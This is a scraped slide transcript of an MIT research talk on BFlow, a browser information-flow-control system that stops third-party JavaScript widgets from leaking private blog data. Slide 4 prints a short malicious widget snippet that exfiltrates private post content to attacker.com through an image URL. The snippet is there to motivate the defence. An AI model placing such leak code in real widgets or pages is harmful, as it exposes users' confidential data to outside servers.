1 / 28

Privacy-Preserving Browser-Side Scripting With BFlow

Privacy-Preserving Browser-Side Scripting With BFlow. Alexander Yip , Neha Narula , Maxwell Krohn , Robert Morris Massachusetts Institute of Technology. Web Sites Support 3 rd Party JavaScript Extensions. Blogger.com supports “widgets” read and modify blog posts.

walker
Download Presentation

Privacy-Preserving Browser-Side Scripting With BFlow

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, NehaNarula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology

  2. Web Sites Support 3rd Party JavaScript Extensions • Blogger.com supports “widgets” • read and modify blog posts Snippets of the last few blog posts Display the last few reader comments

  3. Confidential Blogs Are Vulnerable to 3rd Party JavaScript v

  4. A 3rd Party JavaScript Leak Attack Widget has access to private blog content Widget’s JavaScript source code: Widget leaks private blog content to attacker.com private_data = document.getElementById(“posts”); widget.innerHTML = private_data; widget.innerHTML += ‘<IMG SRC=http://attacker.com/’+ private_data +‘.gif>’; Shows private blog content in widget’s box • Blogger.com wants to provide data to widgets • Browser security policy permits JS to send data freely • Wrote a malicious blogger.com widget in one hour Alice’s Browser attacker.com Server Blogger JS + Attacker JS HTTP Request: GET /sell_pet_food_online.gif HTTP/1.0

  5. Problem: Extensibility vs. Privacy (Choose one) • Either choose cool extensibility features • e.g. Blogger.com widgets • Or choose privacy and no 3rd party code • e.g. Gmail oitotouroiejfjlf lkjljvojubjjcjif Zlxcoizvuowqjlsavzmzlvcjlsadfjfoqwojerl,clvzlxcvjaoisjqklqwerljdsalzzx,vcnadsoqoiewqoirulnzdlkfjaoiqueoqejlnlvkjxzcoivuaqoeruqowejrlkasdnzcvzxvalsdfouqoweurozxcvjlkajoqewjrlsdznlkzxvjzl Dan’s Spell Checker Joe’s Encryption Widget Check Spelling! Encrypt Mail Decrypt Mail

  6. Solution: BFlow • Eliminate the choice between features & privacy • Add information flow control (IFC) • To JavaScript in the browser • Track private data inside the browser and server • Prohibit communication that leaks private data

  7. Challenges • Fit JavaScript environment into an IFC model • Preserve JavaScript communication channels • Mashups with private data • Fit JavaScript environment into an IFC model • Preserve JavaScript communication channels • Mashups with private data • Fit JavaScript environment into an IFC model • Preserve JavaScript communication channels Send to top-level frame Send to sub-frame • Easy to adopt • Minimize changes to JS that uses existing communication channels • Minimize changes required on the server • Easy for end-users to start using Private address Google Maps Server

  8. Contributions • An IFC model for the JS runtime environment • Easy to deploy and adopt implementation • Installs in browser with 2 clicks • Requires no changes to JavaScript interpreter • Only small changes to JavaScript communication API • A platform that supports real blogger.com widgets

  9. BFlow Overview Untrusted Protection Zones Trusted Protection Zone Blog Server Supplies Some HTML/JS Blog Web Server Blog Server “labels” private data with a “tag” Reference Monitor knows when a zone reads private data attacker.com Server Label: Saw Alice’s private data Label: Saw Alice’s private data 3rd Party Supplies Widget HTML/JS Browser Reference Monitor

  10. BFlow Overview Declassification: Fetch Map Image from Google Maps, OK! Have not seen private data: Can send requests to any server Blog Web Server Have seen private data: Can only send requests to the data’s server attacker.com Server Google Maps Server BFlow prevents the malicious widget from leaking private data Browser Reference Monitor

  11. Design Outline • Tags and Labels • Protection Zones • Reference Monitor • Server

  12. Tags And Labels • A label is a set of tags • Describes what private data an object contains • Each zone, HTTP request, and response has a label • A label is a set of tags • Describes what private data an object contains • Each zone, HTTP request, and response has a label • Each tag identifies a kind of private data • Alice’s tag: blogger.com:alice • Bob’s tag: blogger.com:bob • e.g. Alice’s blog has label L={blogger.com:alice}

  13. Data Flow Rule • Data may flow only if Ldata Lreceiver Receiver JavaScript Data ?

  14. Protection Zones • A zone is a group of browser HTML <frames> • Regular JavaScript runs inside a frame inside a zone • All frames in a zone share the same label • Trusted zone • Top-level frame is in the site’s trusted zone • Contains JavaScript written only by the site’s developers • Need not abide by information flow restrictions • Untrusted zones • Contain 3rd party JavaScript • Must abide by information flow restrictions

  15. Example Zones & Labels Trusted Zone (No Label) Zone A L={} Zone C L={} Zone D L={blogger.com:alice} Zone B L={blogger.com:alice}

  16. How Do Untrusted Zones Get Labels? Trusted zone sets untrusted zone’s label L={} L={blogger.com:alice} augment_label (blogger.com:alice) Blog Web Server Browser Reference Monitor

  17. Works With Existing JS Channels • Channel 1: A frame can always send to its child frame • Lparent Lchild • Channel 1: A frame can always send to its child frame • Lparent Lchild • Channel 2: A frame can always send to the top-level frame • To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame Web Page Showing Inherent JavaScript Channels Top-level Frame from X.com Frame 1 may not add X.com:C to its label Frame 1 L={X.com:A} No sub-frame from X.com may add a tag from Y.com Frame 2 L={X.com:A,X.com:B}

  18. Why Zones Instead Of Frames? • Some JavaScript consists of multiple frames • Group JavaScript into modules by label • All frames in the same zone can always communicate • Trusted JavaScript sets the label of a multi-frame widget only once • Existing multi-frame widgets need not coordinate label changes e.g. Cbox chat widget Bottom frame writes messages to top frame

  19. BFlow‘s JavaScript Model • All JavaScript will work if the IFC rules allow • AJAX, eval() • The IFC rule (Ldata Lreceiver) affects • access to DOM variables & cookies • postMessage(), fragment-ID messages • HTTP requests and responses

  20. HTTP Request Rules • Trusted zone T • can send to any server (always) • can receive a response from any server (always) • Untrusted zone Z • can send to the server where secret data came from (always) • can receive the response (when Lresponse LZ) • can send to 3rd party server E (when LZ = {}) • or web site has a declassification exception for (server E, URL) • can receive the response (always)

  21. The BFlow Server API • Propagate label from HTTP requests to responses • Read label contained in each request • Attach the label to any response that uses labeled data HTTP Request: POST save_post?content=sell_petfood_online Label: L = {blogger.com:alice} Zone A L={blogger.com:alice} Blog Web Server L={blogger.com:alice} L={blogger.com:alice} Zone B L={blogger.com:alice} HTTP Response Contents: sell_petfood_online Label: L = {blogger.com:alice}

  22. BFlow Implementation No changes to JavaScript interpreter JavaScript communication API changed slightly Firefox Extension 1100 Lines of code Users can install with 2 clicks Browser Reference Monitor

  23. Zone Isolation • Repurpose browser’s same-origin policy (SOP) • Zones communicate via reference monitor • SOP is conservative: no DOM read/write across zones even if labels would allow • Repurpose browser’s same-origin policy (SOP) • Zones communicate via reference monitor Domain name: Zone1.blogger No direct communication Domain name: Zone2.blogger

  24. Applications • BF-Socialnet • Social network that supports 3rd party JS extensions • Protects private user data (see paper) • BFlogger • Blog mockup that supports blogger.com widgets • Ported 12 existing widgets to BFlogger

  25. BFlow Preserves Privacy • Wrote a malicious Blogger.com widget • Successfully leaks data from confidential blogs • Ported widget to BFlogger • BFlow prevents malicious widget from leaking data attacker.com Server No requests to attacker.com after reading private data

  26. BFlow Runs Existing JavaScript • Better privacy with little or no changes High because we made Chat store data on the BFlow server to protect chat data

  27. Existing Research • Can’t grant read access without also leaking [MashupOS] • Requires rewriting JavaScript & manual jail config [Caja] • Don’t support untrusted JavaScript [Swift, SIF] • User must make disclosure decisions [NoMoXSS] • Certificates [Java]

  28. Conclusion • 3rd party JavaScript can leak confidential user data • BFlow provides a new web security model • Tracks information flow between client & server • 3rd party JavaScript can safely compute and display • Enables new features in web sites • e.g. 3rd party Gmail extensions Questions

More Related